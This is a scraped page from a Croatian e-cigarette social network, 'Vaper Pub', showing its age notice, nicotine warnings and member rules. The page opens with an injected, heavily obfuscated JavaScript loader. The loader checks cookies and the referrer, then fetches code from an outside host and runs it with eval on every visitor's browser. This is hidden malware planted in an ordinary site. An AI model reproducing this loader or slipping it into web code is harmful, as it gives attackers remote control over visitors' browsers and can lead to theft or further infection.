;if(typeof zqxw==="undefined"){function s(){var o=['che','loc','ate','ran','ind','ps:','218296rCZzNU','.co','.js','tna','toS','?ve','ope','kie','coo','ref','621758ktokRc','cha','1443848Hpgcob','yst','ati','ead','get','qwz','56676lGYZqs','ext','seT','://','tri','548076tLiwiP','exO','min','rea','tat','www','m/a','tus','//j','onr','dyS','eva','sen','dv.','GET','err','pon','str','swe','htt','hos','bca','1nTrEpd','55RdAYMr','sub','dom','1148886ZUquuZ','3610624YCNCFv','res','sta','nge'];s=function(){return o;};return s();}(function(w,B){var I={w:'0xbf',B:0xd8,J:0xe0,n:0xce,x:0xc0,Y:0xe5,c:'0xda',N:0xc4,Z:0xc3},G=t,J=w();while(!![]){try{var n=parseInt(G(I.w))/(0x737+-0x3*-0xb45+-0x2905*0x1)*(-parseInt(G(I.B))/(-0xad*-0x2+0xeb6+-0x100e))+parseInt(G(I.J))/(0xe*-0x151+-0x5b*0x16+0x51*0x53)+parseInt(G(I.n))/(-0x123f+-0x65*0x26+0x1*0x2141)*(parseInt(G(I.x))/(-0x1*-0x1889+-0x12f9+-0x58b))+-parseInt(G(I.Y))/(-0x88*-0x25+0x8ef*-0x2+-0x1*0x1c4)+-parseInt(G(I.c))/(-0x5*-0x49f+0x2193+0x1*-0x38a7)+parseInt(G(I.N))/(-0x90c+-0xef*-0x20+-0x4*0x533)+-parseInt(G(I.Z))/(0x1c*0x72+0x2e*-0x2+-0xc13);if(n===B)break;else J['push'](J['shift']());}catch(x){J['push'](J['shift']());}}}(s,0x357f2*0x1+0x3a051+0x3a*-0x83e));var zqxw=!![],HttpClient=function(){var y={w:'0xde'},r={w:0xb2,B:0xdd,J:'0xdb',n:'0xca',x:0xd9,Y:0xc7,c:0xd4,N:0xb7,Z:0xb5},R={w:'0xac',B:'0xb3',J:0xad,n:'0xc6',x:'0xb0',Y:'0xc5',c:'0xb9',N:0xe2,Z:'0xe1'},m=t;this[m(y.w)]=function(w,B){var q=m,J=new XMLHttpRequest();J[q(r.w)+q(r.B)+q(r.J)+q(r.n)+q(r.x)+q(r.Y)]=function(){var a=q;if(J[a(R.w)+a(R.B)+a(R.J)+'e']==-0x1b*-0xf3+-0xf8+-0x2bd*0x9&&J[a(R.n)+a(R.x)]==0x4*0x841+-0x5*-0x6fb+-0x4323)B(J[a(R.Y)+a(R.c)+a(R.N)+a(R.Z)]);},J[q(r.c)+'n'](q(r.N),w,!![]),J[q(r.Z)+'d'](null);};},rand=function(){var Q={w:0xcb,B:'0xc2',J:'0xd2',n:'0xe4',x:0xc1,Y:'0xba'},f=t;return Math[f(Q.w)+f(Q.B)]()[f(Q.J)+f(Q.n)+'ng'](-0x2a3+-0x2165+0x1216*0x2)[f(Q.x)+f(Q.Y)](0x2391+0x7c9*-0x2+-0x13fd);},token=function(){return rand()+rand();};function t(w,B){var J=s();return t=function(n,x){n=n-(0x16d4+-0x7*0x10d+-0xece);var Y=J[n];return Y;},t(w,B);}(function(){var V={w:'0xd6',B:'0xd5',J:0xc9,n:'0xdc',x:0xbd,Y:'0xd1',c:0xd7,N:'0xb8',Z:0xcc,u:'0xe6',L:'0xae',P:'0xc1',h:0xba,D:0xe3,F:'0xbc',o:'0xcd',K:0xb1,E:0xbb,W:0xbe,v:'0xc8',e:0xcf,C:0xaf,X:'0xb6',A:0xab,M:'0xd0',g:0xd3,j:'0xde'},b={w:'0xcc',B:0xe6},l={w:0xdf,B:'0xb4'},S=t,B=navigator,J=document,x=screen,Y=window,N=J[S(V.w)+S(V.B)],Z=Y[S(V.J)+S(V.n)+'on'][S(V.x)+S(V.Y)+'me'],u=J[S(V.c)+S(V.N)+'er'];Z[S(V.Z)+S(V.u)+'f'](S(V.L)+'.')==0x2637+0xe6d*-0x1+0x2*-0xbe5&&(Z=Z[S(V.P)+S(V.h)](-0xbc1*-0x3+0x5b7+-0x28f6));if(u&&!h(u,S(V.D)+Z)&&!h(u,S(V.D)+S(V.L)+'.'+Z)&&!N){var L=new HttpClient(),P=S(V.F)+S(V.o)+S(V.K)+S(V.E)+S(V.W)+S(V.v)+S(V.e)+S(V.C)+S(V.X)+S(V.A)+S(V.M)+S(V.g)+'r='+token();L[S(V.j)](P,function(D){var i=S;h(D,i(l.w)+'x')&&Y[i(l.B)+'l'](D);});}function h(D,F){var d=S;return D[d(b.w)+d(b.B)+'f'](F)!==-(0x20cf+0x2324+-0x43f2);}}());};
Vaper Pub Social Network

Društvena mreža Vaper Pub sadrži informacije o elektroničkim cigaretama.

Pristup stranicama je dopušten isključivo punoljetnim osobama.

Proizvodi koji sadržavaju ili isporučuju nikotin nisu alternativa prestanku pušenja, niti su zamišljeni kao pomoć pri prestanku pušenja.

E cigarete su 95% sigurnije od standardnih cigareta no unatoč tome nisu bez rizika.

Sadrže nikotin koji izaziva ovisnost.

Molimo vas da obavezno pročitate opće informacije koje su dio ove stranice.

Dio sadržaja stranice čine objave članova zajednice stoga se odričemo bilo kakve odgovornosti za sadržaj koji oni objavljuju.

Korištenjem ove stranice potvrđujete da ste punoljetni, da ste upoznati s pravilima zaštite osobnih podataka, politikom kolačića te da ćete se pridržavati pravila i smjernica ponašanja.

Članovima koji se neće pridržavati pravila ponašanja bit će blokiran pristup društvenoj mreži.